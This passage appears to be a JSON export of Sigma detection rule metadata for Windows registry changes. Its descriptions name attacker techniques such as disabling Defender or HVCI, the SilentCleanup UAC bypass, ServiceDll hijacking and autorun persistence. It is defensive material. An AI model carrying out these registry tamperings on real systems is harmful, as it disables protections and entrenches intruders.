"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "value": "Office Autorun Keys Modification" }, { "description": "Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Anish Bogati", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/", "https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } 
], "uuid": "8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "value": "Hypervisor Enforced Code Integrity Disabled" }, { "description": "Detects when attackers or tools disable Windows Defender functionalities via the Windows registry", "meta": { "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel", "creation_date": "2022-08-01", "falsepositive": [ "Administrator actions via the Windows Defender interface", "Third party Antivirus" ], "filename": "registry_set_windows_defender_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting", "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", "https://securelist.com/key-group-ransomware-samples-and-telegram-schemes/114025/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105", "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_windows_defender_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0eb46774-f1ab-4a74-8238-1155855f2263", "value": "Disable Windows Defender Functionalities Via Registry Keys" }, { "description": "Detects the setting of the environment variable \"windir\" to a non default 
value.\nAttackers often abuse this variable in order to trigger a UAC bypass via the \"SilentCleanup\" task.\nThe SilentCleanup task located in %windir%\\system32\\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.\n", "meta": { "author": "frack113, Nextron Systems", "creation_date": "2022-01-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task", "https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "724ea201-6514-4f38-9739-e5973c34f49a", "value": "Bypass UAC Using SilentCleanup Task" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": 
"registry_set_asep_reg_keys_modification_classes.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9df5f547-c86a-433e-b533-f2794357e242", "value": "Classes Autorun Keys Modification" }, { "description": "Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-03-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_sentinelone_shell_context_tampering.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://mrd0x.com/sentinelone-persistence-via-menu-context/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sentinelone_shell_context_tampering.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "6c304b02-06e6-402d-8be4-d5833cdf8198", "value": "Potential SentinelOne Shell Context Menu Scan Command Tampering" }, { "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unknown" ], "filename": 
"registry_set_disable_autologger_sessions.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "f37b4bce-49d0-4087-9f5b-58bffda77316", "value": "Potential AutoLogger Sessions Tampering" }, { "description": "Hides the file extension through modification of the registry", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Administrative scripts" ], "filename": "registry_set_hidden_extention.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/ransomware-families/", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hidden_extention.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5df86130-4e95-4a54-90f7-26541b40aec2", "value": "Registry Modification to Hidden File Extension" }, { "description": "Detects changes to the AppInstaller (winget) admin settings. 
Such as enabling local manifest installations or disabling installer hash checks", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "The event doesn't contain information about the type of change. False positives are expected with legitimate changes" ], "filename": "registry_set_winget_admin_settings_tampering.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/microsoft/winget-cli/blob/02d2f93807c9851d73eaacb4d8811a76b64b7b01/src/AppInstallerCommonCore/Public/winget/AdminSettings.h#L13", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_admin_settings_tampering.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "6db5eaf9-88f7-4ed9-af7d-9ef2ad12f236", "value": "Winget Admin Settings Modification" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", "value": "CurrentVersion NT Autorun Keys Modification" }, { "description": "Detects the installation of a new shim database where the file is located in a non-default location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_shim_database_uncommon_location.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/", "https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b6976a3-b0e6-4723-ac24-ae38a737af41", "value": "Potential Persistence Via Shim Database In Uncommon Location" }, { "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry.\nThis is often used as a method of persistence.\n", "meta": { "author": "frack113", "creation_date": "2022-02-04", "falsepositive": [ "Administrative scripts", 
"Installation of a service" ], "filename": "registry_set_servicedll_hijack.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", "value": "ServiceDll Hijack" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, 
"related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", "value": "WinSock2 Autorun Keys Modification" }, { "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_add_port_monitor.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "value": "Add Port Monitor Persistence in Registry" }, { "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup 
handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unknown" ], "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/diskcleanuphandler.html", "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", "value": "Persistence Via Disk Cleanup Handler - Autorun" }, { "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", "meta": { "author": "Austin Songer", "creation_date": "2021-07-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_dns_over_https_enabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS", "https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html", "https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode", "https://github.com/elastic/detection-rules/issues/1371", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140", "attack.t1112" ] }, "related": [ { "dest-uuid": 
"3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "value": "DNS-over-HTTPS Enabled by Registry" }, { "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "creation_date": "2022-06-15", "falsepositive": [ "Administrator actions" ], "filename": "registry_set_enabling_turnoffcheck.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" }, { "description": "Detect set Notification_Suppress to 1 to disable the Windows security center notification", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_suppress_defender_notifications.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" 
], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "value": "Activate Suppression of Windows Security Center Notifications" }, { "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Unlikely" ], "filename": "registry_set_hhctrl_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/hhctrl.html", "https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "f10ed525-97fe-4fed-be7c-2feecca941b1", "value": "Persistence Via Hhctrl.ocx" }, { "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate VBScript" ], "filename": "registry_set_bginfo_custom_vbscript.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"992dd79f-dde8-4bb0-9085-6350ba97cfb3", "value": "New BgInfo.EXE Custom VBScript Registry Configuration" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "value": "CurrentControlSet Autorun Keys Modification" }, { "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2022-02-24", "falsepositive": [ "Legitimate disabling of crashdumps" ], "filename": "registry_set_crashdump_disabled.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml" ], "tags": [ "attack.t1564", "attack.t1112" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2ff692c2-4594-41ec-8fcb-46587de769e0", "value": "CrashControl CrashDump Disabled" }, { "description": "Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via \"BgInfo.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-16", "falsepositive": [ "Legitimate WMI query" ], "filename": "registry_set_bginfo_custom_wmi_query.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd277474-5c52-4423-a52b-ac2d7969902f", "value": "New BgInfo.EXE Custom WMI Query Registry Configuration" }, { "description": "Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.", "meta": { "author": "Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-05-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_access_vbom_tamper.yml", 
"level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "value": "Trust Access Disable For VBApplications" }, { "description": "Detects potential persistence behavior using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", "meta": { "author": "Lednyov Alexey, oscd.community, Sreeman", "creation_date": "2020-10-16", "falsepositive": [ "Unknown" ], "filename": "registry_set_telemetry_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"73a883d0-0348-4be4-a8d8-51031c2564f8", "value": "Potential Registry Persistence Attempt Via Windows Telemetry" }, { "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to prepend information to the PATH environment variable on a per-application, per-process basis.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Legitimate applications registering their binary from one of the suspicious locations mentioned above (tune it)" ], "filename": "registry_set_persistence_app_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://learn.microsoft.com/en-us/windows/win32/shell/app-registration", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml" ], "tags": [ "attack.persistence", "attack.t1546.012" ] }, "related": [ { "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", "value": "Potential Persistence Via App Paths Default Property" }, { "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", "meta": { "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "creation_date": "2022-09-29", "falsepositive": [ "Some of the keys 
mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], "filename": "registry_set_terminal_server_suspicious.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", "value": "RDP Sensitive Settings Changed to Zero" 